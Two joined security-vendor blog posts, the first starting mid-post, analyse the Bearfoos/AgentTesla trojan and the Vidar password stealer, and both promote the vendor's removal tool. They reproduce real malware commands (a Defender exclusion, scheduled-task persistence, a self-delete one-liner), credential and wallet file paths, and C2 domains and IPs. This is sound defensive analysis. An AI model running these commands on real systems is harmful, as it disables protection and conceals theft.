HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\DisableAntiVirus

These registry values pertain to various components of the system’s anti-malware protection settings. The malware checks these settings to understand the system’s security posture and plan further actions. In our scenario, when the Defender settings were not altered by default, Bearfoos proceeded to alter Defender. It executes this selection of commands:

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\\AppData\Roaming\vzCravLx.exe
"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\vzCravLx" /XML "C:\Users\\AppData\Local\Temp\tmp6EAE.tmp

This is what provides persistence to the malware. With the first command, it excludes the path to its own executable and from Microsoft Defender scanning. The second command calls for the creation of a task in Task Scheduler to run the malware every once in a while. After that, Bearfoos a.k.a AgentTesla deletes the original file and keeps operating only with these protected duplicates.

Data Collection

The next phase involves the collection of sensitive information. First of all, the malware checks a selection of files that belong to web browsers, seeking for passwords, cookies and session tokens. Here is the list of browsers in question:

As we can see, these locations mainly consist of user data from Chromium-based web browsers. Aside from them, malware crawls credentials from desktop mailing clients and some FTP/VPN applications.

Command & Control Server

The Bearfoos trojan sends HTTP requests to the following addresses to download various files, including a CAB file from the Windows Update server and certificates from Sectigo and Microsoft:

GET http://download.windowsupdate.com/d/msdownload/update/others/2015/05/17930914_a3b333eff1f0428f5a2c87724c542504821cdbd8.cab
GET http://crt.sectigo.com/SectigoPublicCodeSigningCAR36.crt 200
GET http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c 200
GET http://www.microsoft.com/pki/certs/MicCodSigPCA_08-31-2010.crt 200
GET http://www.microsoft.com/pki/certs/MicrosoftTimeStampPCA.crt 200

These requests might be attempts to disguise malicious activity as legitimate actions. The malware also resolves DNS names for several domains, including the legitimate download.windowsupdate.com, and potentially suspicious domains such as mail.commtechtrading[.]com and chir104.websitehostserver[.]net. These latter domains could be part of its command-and-control (C2) infrastructure used for data exfiltration. The malware establishes the following TCP/UDP connections with various IP addresses:

TCP 23.53.122.213:80
TCP 173.236.63.6:587
TCP 20.99.133.109:443
TCP 23.216.147.71:80
TCP 23.216.81.152:80
UDP 192.168.0.12:137

After completing the data exfiltration, the malware enters a waiting mode, listening for commands from the C2 server. During this standby period, it continues to collect data, capturing keystrokes, taking screenshots, and recording audio and video from peripheral devices.

Is Trojan:Win32/Bearfoos.B!ml a False Positive?

As I mentioned earlier, the detection of Trojan:Win32/Bearfoos.B!ml is performed using Microsoft Defender’s AI-based system. However, this method is prone to false positives, and legitimate files, such as those associated with recently updated games or programs, are often mistakenly flagged as malicious. In particular, it is often to see false positives in small-batch programs from GitHub, certain emulator apps, and in some bizarre cases even own Windows files.

While it is easy to spot a false positive with a program that you know and trust, doing so with a less familiar app may be problematic. If you are not sure about the source and developer, bold guessing may be a particularly destructive practice. That is why a second opinion anti-malware scan is needed.

How to Remove Trojan:Win32/Bearfoos.B!ml?

To remove Bearfoos.B!ml trojan or check whether it is a real detection, I recommend using GridinSoft Anti-Malware. This program is not vulnerable to malware attacks as Microsoft Defender, and will easily spot even the most recent malware samples, thanks to its multi-component detection system. Follow the guide below to get your system as good as new.

Download and install Anti-Malware by clicking the button below. After the installation, run a Full scan: this will check all the volumes present in the system, including hidden folders and system files. Scanning will take around 15 minutes.

After the scan, you will see the list of detected malicious and unwanted elements. It is possible to adjust the actions that the antimalware program does to each element: click "Advanced mode" and see the options in the drop-down menus. You can also see extended information about each detection - malware type, effects and potential source of infection.

Click "Clean Now" to start the removal process. Important: removal process may take several minutes when there are a lot of detections. Do not interrupt this process, and you will get your system as clean as new.

The post Trojan:Win32/Bearfoos.B!ml appeared first on Gridinsoft Blog.

What Is a Password Stealer?

As its name suggests, password stealer is a type of malware that aims to steal sensitive data. Mainly, this is about credentials to email accounts, social networks, and online banking. But these days, quite a few password stealers incorporate more diverse functionality. They now target crypto wallets, cookies, browser cache and saved passwords, Discord session tokens, and more.

The primary distribution method of password stealers is phishing emails with malicious attachments. Sometimes, however, password stealers can also be distributed via malicious ads in search results. In a selection of cases, spear phishing was used to attack a specific person with the malware.

Technical Analysis

All stealers are generally very similar, so the properties that the current instance has to apply to the others, perhaps with minimal differences. This will be a rather simplified analysis aimed at understanding how password stealer works. I will get through the most common and important actions that this malware does. For the test sample, I’ve chosen Vidar Stealer – a classic password stealer written in C++. The attack commonly begins when the victim runs an infected file.

Defense Evasion

Like most malware, it has a few tricks that make it particularly difficult to detect on the system. When the malware comes under the guise of the installer of a legitimate program, it can contain a row of null bytes at the beginning, which pushes its size over 700 MB. This size allows it to avoid instant detection by antivirus solutions and online checkers like VirusTotal. Another trick aimed at evading detection is code obfuscation. The malware also checks system parameters to ensure it is not running in a virtualized environment. It checks values such as:

HKLM/System/Setup
HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\MachineGuid

These keys contain information about the system and hardware, which allows you to create a digital fingerprint of the infected system in addition to identification.

Data Collection

Once the malware is convinced that it is not running in a sandbox and has established a foothold in the system, it moves on to its primary function – information gathering. password stealer collects the following information from browsers:

C:\Users\admin\AppData\Local\Temp\History\History.IE5\index.dat
C:\Users\admin\AppData\Local\Temp\Temporary Internet Files\Content.IE5\index.dat
C:\Users\admin\AppData\Roaming\Microsoft\Windows\Cookies\index.dat
C:\Windows\system32\CRYPTBASE.dll
C:\Documents and Settings\\Application Data\Microsoft\CryptnetUrlCache\Content\2BF68F4714092295550497DD56F57004
C:\Users\user\AppData\Local\Google\Chrome\User Data\

These folders contain information such as autofill, saved passwords, cookies, cache, and browser extensions. Next, stealer tries to collect crypto wallet data by checking the locations you can see below. This list includes only a few wallets, as the exact list is too long to mention.

C:\Users\user\AppData\Local\Blockstream\Green\wallets\
C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\

Data Exfiltration

The malware’s final operation step is stolen data exfiltration. To do this, password stealer communicates with C2 (Command and Control) to receive further instructions. By the way, there can be various options for communicating with C2. Attackers often still use classic C2 servers; sometimes, they use Telegram or Mastodon as intermediate servers. However, in our case, the malware uses Steam. Before sending the stolen data, stealer sends several requests, including:

GET https://steamcommunity.com/profiles/76561199548518734 200

This is a link to a Steam profile. However, the strange name profile’s name “sppmon http://195.201.131.165|” is the command for malware. This is actually the address of the final server that the stealer should connect to. The phrase “This user has also played as” suggests that the address in the name changes quite often.

When finished, stealer self-deletes itself and covers its tracks. Though, not all infostealers do this, preferring to stay in the system even after extracting all the data. But when they do, the shell command comes in handy:

"%ComSpec%" /c taskkill /im "%SAMPLENAME%" /f & erase "%SAMPLEPATH%" & exit

Difference Between Password Stealer and Spyware

Password stealers and spyware may look similar, but have some fundamental differences. The first difference lies in the principle of operation: stealer works quietly and quickly, often sticking to “steal and leave” tactics. Spyware, on the other hand, aims at a long and permanent presence in the system. Although some stealers can take screenshots and capture keyboard inputs in addition to collecting sensitive data, this is not the main functionality.

Spyware, on the other hand, can stay on an infected system for months and continuously collect data. This includes screenshots, capturing keystrokes, and camera and microphone recordings. This data is sent periodically or in real-time to the attacker’s server.

Safety Recommendations

Malware and password stealers in particular tend to become more and more sophisticated. Getting harder to detect, picking new spreading ways, collecting more and more data – all this makes them a menace to be aware about. Fortunately, the ways to prevent this from getting into your PC is not particularly hard.

• Be careful with email attachments. This method is still the leading method among successful malware infections. Do not open attachments or click on links if the email has a suspicious sender or is not the email you were intentionally expecting.
• Avoid cracked software. Pirated software is illegal in itself, but it carries serious risks. Attackers embed malicious code in “repacks”, as installing most hacked programs requires disabling security software.
• Use security software. A reliable antimalware solution is essential because it can prevent malware from running and installing in case of user error. In addition, it will generally provide comprehensive protection by significantly reducing infection vectors. In addition, advanced solutions such as GridinSoft Anti-Malware have an Internet Security module that blocks potentially malicious sites.

The post Password Stealer appeared first on Gridinsoft Blog.